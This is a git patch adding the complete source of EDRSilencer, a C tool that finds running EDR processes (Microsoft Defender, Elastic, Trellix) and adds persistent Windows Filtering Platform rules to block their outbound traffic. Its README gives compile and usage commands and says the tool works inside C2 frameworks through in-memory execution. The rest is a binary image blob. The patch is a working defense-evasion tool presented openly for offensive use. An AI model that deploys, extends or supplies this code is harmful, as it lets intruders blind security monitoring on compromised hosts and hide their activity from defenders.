From fe19f1b2a920572bb79150a833bc872bb711d8fc Mon Sep 17 00:00:00 2001 From: netero1010 Date: Tue, 26 Dec 2023 12:16:43 +0800 Subject: [PATCH] First commit --- EDRSilencer.c | 346 ++++++++++++++++++++++++++++++++++++++++++++++++++ README.md | 45 +++++++ example.png | Bin 0 -> 45151 bytes utils.c | 106 ++++++++++++++++ utils.h | 10 ++ 5 files changed, 507 insertions(+) create mode 100644 EDRSilencer.c create mode 100644 README.md create mode 100644 example.png create mode 100644 utils.c create mode 100644 utils.h diff --git a/EDRSilencer.c b/EDRSilencer.c new file mode 100644 index 0000000..3c849d2 --- /dev/null +++ b/EDRSilencer.c @@ -0,0 +1,346 @@ +#include "utils.h" + +char* edrProcess[] = { +// Microsoft Defender for Endpoint and Microsoft Defender Antivirus + "MsMpEng.exe", + "MsSense.exe", +// Elastic EDR + "elastic-agent.exe", + "elastic-endpoint.exe", + "filebeat.exe", +// Trellix EDR + "xagt.exe" +}; + +BOOL inWfpFlag[sizeof(edrProcess) / sizeof(edrProcess[0])] = { FALSE }; + +// The "unblockall" feature will delete all filters that are based on the custom filter name +WCHAR* filterName = L"Custom Outbound Filter"; + +// d78e1e87-8644-4ea5-9437-d809ecefc971 +DEFINE_GUID( + FWPM_CONDITION_ALE_APP_ID, + 0xd78e1e87, + 0x8644, + 0x4ea5, + 0x94, 0x37, 0xd8, 0x09, 0xec, 0xef, 0xc9, 0x71 +); + +// c38d57d1-05a7-4c33-904f-7fbceee60e82 +DEFINE_GUID( + FWPM_LAYER_ALE_AUTH_CONNECT_V4, + 0xc38d57d1, + 0x05a7, + 0x4c33, + 0x90, 0x4f, 0x7f, 0xbc, 0xee, 0xe6, 0x0e, 0x82 +); + +// 4a72393b-319f-44bc-84c3-ba54dcb3b6b4 +DEFINE_GUID( + FWPM_LAYER_ALE_AUTH_CONNECT_V6, + 0x4a72393b, + 0x319f, + 0x44bc, + 0x84, 0xc3, 0xba, 0x54, 0xdc, 0xb3, 0xb6, 0xb4 +); + +// Check if the running process is our list +BOOL isInEdrProcessList(const char* procName) { + for (int i = 0; i < sizeof(edrProcess) / sizeof(edrProcess[0]); i++) { + if (strstr(procName, edrProcess[i]) != NULL && !inWfpFlag[i]) { + inWfpFlag[i] = TRUE; + return TRUE; + } + } + return FALSE; +} + +// Add WFP filters for all known EDR process(s) +void BlockEdrProcessTraffic() { + HANDLE hEngine; + FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine); + HANDLE hProcessSnap; + HANDLE hModuleSnap; + PROCESSENTRY32 pe32; + MODULEENTRY32 me32; + BOOL isEdrDetected = FALSE; + + EnableSeDebugPrivilege(); + + hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (hProcessSnap == INVALID_HANDLE_VALUE) { + printf("[-] CreateToolhelp32Snapshot (of processes) failed with error code: 0x%x\n", GetLastError()); + return; + } + + pe32.dwSize = sizeof(PROCESSENTRY32); + if (!Process32First(hProcessSnap, &pe32)) { + printf("[-] Process32First failed with error code: 0x%x\n", GetLastError()); + CloseHandle(hProcessSnap); + return; + } + + do { + if (isInEdrProcessList(pe32.szExeFile)) { + isEdrDetected = TRUE; + printf("Detected running EDR process: %s (%d):\n", pe32.szExeFile, pe32.th32ProcessID); + // Get full path of the running process + HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pe32.th32ProcessID); + if (hProcess) { + WCHAR fullPath[MAX_PATH]; + DWORD size = MAX_PATH; + QueryFullProcessImageNameW(hProcess, 0, fullPath, &size); + FWPM_FILTER_CONDITION0 cond; + FWPM_FILTER0 filter = {0}; + FWP_BYTE_BLOB* appId; + + if (FwpmGetAppIdFromFileName0(fullPath, &appId) != ERROR_SUCCESS) { + printf(" [-] FwpmGetAppIdFromFileName0 failed to get app ID.\n"); + CloseHandle(hProcess); + continue; + } + + // Setting up WFP filter and condition + filter.displayData.name = filterName; + filter.flags = FWPM_FILTER_FLAG_PERSISTENT; + filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4; + filter.action.type = FWP_ACTION_BLOCK; + cond.fieldKey = FWPM_CONDITION_ALE_APP_ID; + cond.matchType = FWP_MATCH_EQUAL; + cond.conditionValue.type = FWP_BYTE_BLOB_TYPE; + cond.conditionValue.byteBlob = appId; + filter.filterCondition = &cond; + filter.numFilterConditions = 1; + + UINT64 filterId; + DWORD result; + + // Add filter to both IPv4 and IPv6 layers + result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId); + if (result == ERROR_SUCCESS) { + printf(" Added WFP filter for \"%S\" (Filter id: %d, IPv4 layer).\n", fullPath, filterId); + } else { + printf(" [-] Failed to add filter in IPv4 layer with error code: 0x%x\n", result); + } + + filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6; + result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId); + if (result == ERROR_SUCCESS) { + printf(" Added WFP filter for \"%S\" (Filter id: %d, IPv6 layer).\n", fullPath, filterId); + } else { + printf(" [-] Failed to add filter in IPv6 layer with error code: 0x%x\n", result); + } + + FwpmFreeMemory0((void**)&appId); + CloseHandle(hProcess); + } else { + printf(" [-] Could not open process \"%s\" with error code: 0x%x\n", pe32.szExeFile, GetLastError()); + } + } + } while (Process32Next(hProcessSnap, &pe32)); + + if (!isEdrDetected) { + printf("[-] No EDR process was detected. Please double check the edrProcess list or add the filter manually using 'block' command.\n"); + } + CloseHandle(hProcessSnap); + FwpmEngineClose0(hEngine); + return; +} + +// Add block WFP filter to user-defined process +void BlockProcessTraffic(char* fullPath) { + HANDLE hEngine; + FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine); + + WCHAR wFullPath[MAX_PATH]; + DWORD size = MAX_PATH; + CharArrayToWCharArray(fullPath, wFullPath, sizeof(wFullPath) / sizeof(wFullPath[0])); + FWPM_FILTER_CONDITION0 cond; + FWPM_FILTER0 filter = {0}; + + FWP_BYTE_BLOB* appId; + + if (FwpmGetAppIdFromFileName0(wFullPath, &appId) != ERROR_SUCCESS) { + printf("[-] FwpmGetAppIdFromFileName0 failed to get app ID. Please check if the process path is valid.\n"); + return; + } + + // Setting up WFP filter and condition + filter.displayData.name = filterName; + filter.flags = FWPM_FILTER_FLAG_PERSISTENT; + filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4; + filter.action.type = FWP_ACTION_BLOCK; + cond.fieldKey = FWPM_CONDITION_ALE_APP_ID; + cond.matchType = FWP_MATCH_EQUAL; + cond.conditionValue.type = FWP_BYTE_BLOB_TYPE; + cond.conditionValue.byteBlob = appId; + filter.filterCondition = &cond; + filter.numFilterConditions = 1; + + UINT64 filterId; + DWORD result; + + // Add filter to both IPv4 and IPv6 layers + result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId); + if (result == ERROR_SUCCESS) { + printf("Added WFP filter for \"%s\" (Filter id: %d, IPv4 layer).\n", fullPath, filterId); + } else { + printf("[-] Failed to add filter in IPv4 layer with error code: 0x%x\n", result); + } + + filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6; + result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId); + if (result == ERROR_SUCCESS) { + printf("Added WFP filter for \"%s\" (Filter id: %d, IPv6 layer).\n", fullPath, filterId); + } else { + printf("[-] Failed to add filter in IPv6 layer with error code: 0x%x\n", result); + } + + FwpmFreeMemory0((void**)&appId); + FwpmEngineClose0(hEngine); + return; +} + +// Remove all WFP filters previously created +void UnblockAllWfpFilters() { + HANDLE hEngine; + DWORD result; + HANDLE enumHandle; + FWPM_FILTER0** filters; + UINT32 numFilters = 0; + BOOL foundFilter = FALSE; + result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine); + if (result != ERROR_SUCCESS) { + printf("[-] FwpmEngineOpen0 failed with error code: 0x%x\n", result); + return; + } + + result = FwpmFilterCreateEnumHandle0(hEngine, NULL, &enumHandle); + if (result != ERROR_SUCCESS) { + printf("[-] FwpmFilterCreateEnumHandle0 failed with error code: 0x%x\n", result); + return; + } + + while(TRUE) { + result = FwpmFilterEnum0(hEngine, enumHandle, 1, &filters, &numFilters); + + if (result != ERROR_SUCCESS) { + printf("[-] FwpmFilterEnum0 failed with error code: 0x%x\n", result); + FwpmFilterDestroyEnumHandle0(hEngine, enumHandle); + FwpmEngineClose0(hEngine); + return; + } + + if (numFilters == 0) { + break; + } + + FWPM_DISPLAY_DATA0 *data = &filters[0]->displayData; + WCHAR* currentFilterName = data->name; + if (wcscmp(currentFilterName, filterName) == 0) { + foundFilter = TRUE; + UINT64 filterId = filters[0]->filterId; + result = FwpmFilterDeleteById0(hEngine, filterId); + if (result == ERROR_SUCCESS) { + printf("Deleted filter id: %llu.\n", filterId); + } else { + printf("[-] Failed to delete filter id: %llu with error code: 0x%x.\n", filterId, result); + } + } + } + + if (!foundFilter) { + printf("[-] Unable to find any WFP filter created by this tool.\n"); + } + FwpmFilterDestroyEnumHandle0(hEngine, enumHandle); + FwpmEngineClose0(hEngine); +} + +// Remove WFP filter based on filter id +void UnblockWfpFilter(UINT64 filterId) { + HANDLE hEngine; + DWORD result; + + result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine); + if (result != ERROR_SUCCESS) { + printf("[-] FwpmEngineOpen0 failed with error code: 0x%x\n", result); + return; + } + + result = FwpmFilterDeleteById0(hEngine, filterId); + + if (result == ERROR_SUCCESS) { + printf("Deleted filter id: %llu.\n", filterId); + } + else if (result == FWP_E_FILTER_NOT_FOUND) { + printf("[-] The filter does not exist.\n"); + } else { + printf("[-] Failed to delete filter id: %llu with error code: 0x%x.\n", filterId, result); + } + + FwpmEngineClose0(hEngine); +} + +void PrintHelp() { + printf("Usage: EDROutBlock.exe \n"); + printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes:\n"); + printf(" EDROutBlock.exe blockedr\n\n"); + printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process (full path is required):\n"); + printf(" EDROutBlock.exe block \"C:\\Windows\\System32\\curl.exe\"\n\n"); + printf("- Remove all WFP filters applied by this tool:\n"); + printf(" EDROutBlock.exe unblockall\n\n"); + printf("- Remove a specific WFP filter based on filter id:\n"); + printf(" EDROutBlock.exe unblock "); +} + +int main(int argc, char *argv[]) { + if (argc < 2) { + PrintHelp(); + return 1; + } + + if (strcasecmp(argv[1], "-h") == 0 || strcasecmp(argv[1], "--help") == 0) { + PrintHelp(); + return 1; + } + + if (!CheckProcessIntegrityLevel()) { + return 1; + } + + if (strcmp(argv[1], "blockedr") == 0) { + BlockEdrProcessTraffic(); + } else if (strcmp(argv[1], "block") == 0) { + if (argc < 3) { + printf("[-] Missing second argument. Please provide the full path of the process to block.\n"); + return 1; + } + BlockProcessTraffic(argv[2]); + } else if (strcmp(argv[1], "unblockall") == 0) { + UnblockAllWfpFilters(); + } else if (strcmp(argv[1], "unblock") == 0) { + if (argc < 3) { + printf("[-] Missing argument for 'unblock' command. Please provide the filter id.\n"); + return 1; + } + char *endptr; + errno = 0; + + UINT64 filterId = strtoull(argv[2], &endptr, 10); + + if (errno != 0) { + printf("[-] strtoull failed with error code: 0x%x\n", errno); + return 1; + } + + if (endptr == argv[2]) { + printf("[-] Please provide filter id in digits.\n"); + return 1; + } + UnblockWfpFilter(filterId); + } else { + printf("[-] Invalid argument: \"%s\".\n", argv[1]); + return 1; + } + return 0; +} \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000..5a557e3 --- /dev/null +++ b/README.md @@ -0,0 +1,45 @@ +# EDRSilencer +Inspired by the closed source FireBlock tool [FireBlock](https://www.mdsec.co.uk/2023/09/nighthawk-0-2-6-three-wise-monkeys/) from MdSec NightHawk, I decided to create my own version and this tool was created with the aim of blocking the outbound traffic of running EDR processes using Windows Filtering Platform (WFP) APIs. + +This tool offers the following features: +- Search known running EDR processes and add WFP filter to block its outbound traffic +- Add WFP filter for a specific process +- Remove all WFP filters created by this tool +- Remove a specific WFP filter by filter id +- Support to run in C2 with in-memory PE execution module (e.g., `BruteRatel's memexec`) + +**The current EDR process block list (edrProcess) includes only a limited number of EDR solutions (e.g., MDE, Elastic EDR). It would be appreciated if someone could assist in expanding the process list in `EDRSilencer.c` to encompass a broader range of other EDR solutions.** + +## Testing Environment +Tested in Windows 10 and Windows Server 2016 + +## Usage +``` +Usage: EDRSilencer.exe +- Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes: + EDRSilencer.exe blockedr + +- Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process (full path is required): + EDRSilencer.exe block "C:\Windows\System32\curl.exe" + +- Remove all WFP filters applied by this tool: + EDRSilencer.exe unblockall + +- Remove a specific WFP filter based on filter id: + EDRSilencer.exe unblock +``` + +## Compile +``` +x86_64-w64-mingw32-gcc EDRSilencer.c -o EDRSilencer.exe -lfwpuclnt utils.c +``` + +## Example +### Detect and block the outbound traffic of running EDR processes +``` +EDRSilencer.exe blockedr +``` +![HowTo](https://github.com/netero1010/EDRSilencer/raw/main/example.png) + +## Credits +https://www.mdsec.co.uk/2023/09/nighthawk-0-2-6-three-wise-monkeys/ \ No newline at end of file diff --git a/example.png b/example.png new file mode 100644 index 0000000000000000000000000000000000000000..c02701a0813a440a86e9f5e647fd1681ab5be75a GIT binary patch literal 45151 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 